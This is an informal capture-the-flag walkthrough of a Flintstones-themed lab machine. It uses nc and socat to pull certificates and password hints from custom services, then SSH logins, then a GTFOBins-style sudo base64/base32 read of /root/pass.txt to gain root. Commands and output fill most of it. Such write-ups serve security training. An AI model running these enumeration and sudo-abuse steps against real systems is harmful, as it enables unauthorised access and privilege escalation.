open ports:-22,80,4040,9009,54321

here i use nc to connect 9009 port that will give me cert of ssl and key for 1 user
nc -v [ip]:9009

i save both key and using socat i find way that give me that user password like this.

─(bobby㉿bobby)-[~/Downloads]
└─$ socat stdio ssl:10.10.126.191:54321,cert=cert,key=id_rsa,verify=0 
2025/07/21 15:25:30 socat[6169] W refusing to set empty SNI host name


 __     __   _     _             _____        _     _             _____        _ 
 \ \   / /  | |   | |           |  __ \      | |   | |           |  __ \      | |
  \ \_/ /_ _| |__ | |__   __ _  | |  | | __ _| |__ | |__   __ _  | |  | | ___ | |
   \   / _` | '_ \| '_ \ / _` | | |  | |/ _` | '_ \| '_ \ / _` | | |  | |/ _ \| |
    | | (_| | |_) | |_) | (_| | | |__| | (_| | |_) | |_) | (_| | | |__| | (_) |_|
    |_|\__,_|_.__/|_.__/ \__,_| |_____/ \__,_|_.__/|_.__/ \__,_| |_____/ \___/(_)
                                                                                 
                                                                                 

Welcome: 'Barney Rubble' is authorized.
b3dr0ck> ls
Unrecognized command: 'ls'

This service is for login and password hints
b3dr0ck> hints
Password hint: d1ad7c0a3805955a35eb260dab4180dd (user = 'Barney Rubble')
b3dr0ck> ^C

than using ssh i open shell as a this user than i find second user but i don't have any access of this user so i thought to escalate privilegesion.

like:-
barney@ip-10-10-126-191:/home/fred$ sudo -l
[sudo] password for barney: 
Matching Defaults entries for barney on ip-10-10-126-191:
    insults, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User barney may run the following commands on ip-10-10-126-191:
    (ALL : ALL) /usr/bin/certutil
    
barney@ip-10-10-126-191:~$ sudo /usr/bin/certutil ls

Current Cert List: (/usr/share/abc/certs)
------------------
total 56
drwxrwxr-x 2 root root 4096 Apr 30  2022 .
drwxrwxr-x 8 root root 4096 Apr 29  2022 ..
-rw-r----- 1 root root  972 Jul 21 09:37 barney.certificate.pem
-rw-r----- 1 root root 1674 Jul 21 09:37 barney.clientKey.pem
-rw-r----- 1 root root  894 Jul 21 09:37 barney.csr.pem
-rw-r----- 1 root root 1678 Jul 21 09:37 barney.serviceKey.pem
-rw-r----- 1 root root  976 Jul 21 09:37 fred.certificate.pem
-rw-r----- 1 root root 1674 Jul 21 09:37 fred.clientKey.pem
-rw-r----- 1 root root  898 Jul 21 09:37 fred.csr.pem
-rw-r----- 1 root root 1678 Jul 21 09:37 fred.serviceKey.pem

here i found same as a first user like key and cert so i uses also socat as a last time and find second user password.

socat stdio ssl:10.10.126.191:54321,cert=cert,key=id_rsa,verify=0
2025/07/21 15:37:25 socat[6769] W refusing to set empty SNI host name


 __     __   _     _             _____        _     _             _____        _ 
 \ \   / /  | |   | |           |  __ \      | |   | |           |  __ \      | |
  \ \_/ /_ _| |__ | |__   __ _  | |  | | __ _| |__ | |__   __ _  | |  | | ___ | |
   \   / _` | '_ \| '_ \ / _` | | |  | |/ _` | '_ \| '_ \ / _` | | |  | |/ _ \| |
    | | (_| | |_) | |_) | (_| | | |__| | (_| | |_) | |_) | (_| | | |__| | (_) |_|
    |_|\__,_|_.__/|_.__/ \__,_| |_____/ \__,_|_.__/|_.__/ \__,_| |_____/ \___/(_)
                                                                                 
                                                                                 

Welcome: 'fredcertificatepem' is authorized.
b3dr0ck> swd
Unrecognized command: 'swd'

This service is for login and password hints
b3dr0ck> hints
Password hint: YabbaDabbaD0000! (user = 'fredcertificatepem')
b3dr0ck> ^C

than i try to escalate privilege as a root.

fred@ip-10-10-126-191:~$ sudo -l
Matching Defaults entries for fred on ip-10-10-126-191:
    insults, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User fred may run the following commands on ip-10-10-126-191:
    (ALL : ALL) NOPASSWD: /usr/bin/base32 /root/pass.txt
    (ALL : ALL) NOPASSWD: /usr/bin/base64 /root/pass.txt
    
 using gtfbio 
 
fred@ip-10-10-126-191:~$ LFILE=/root/pass.txt
fred@ip-10-10-126-191:~$ sudo base64 "$LFILE" | base64 --decode
LFKEC52ZKRCXSWKXIZVU43KJGNMXURJSLFWVS52OPJAXUTLNJJVU2RCWNBGXURTLJZKFSSYK
fred@ip-10-10-126-191:~$ sudo base32 "$LFILE" | base32 --decode
LFKEC52ZKRCXSWKXIZVU43KJGNMXURJSLFWVS52OPJAXUTLNJJVU2RCWNBGXURTLJZKFSSYK
 
 here after one base 32 and base 64 than md5 i got a root password than i using sudo root i gain root privileges.
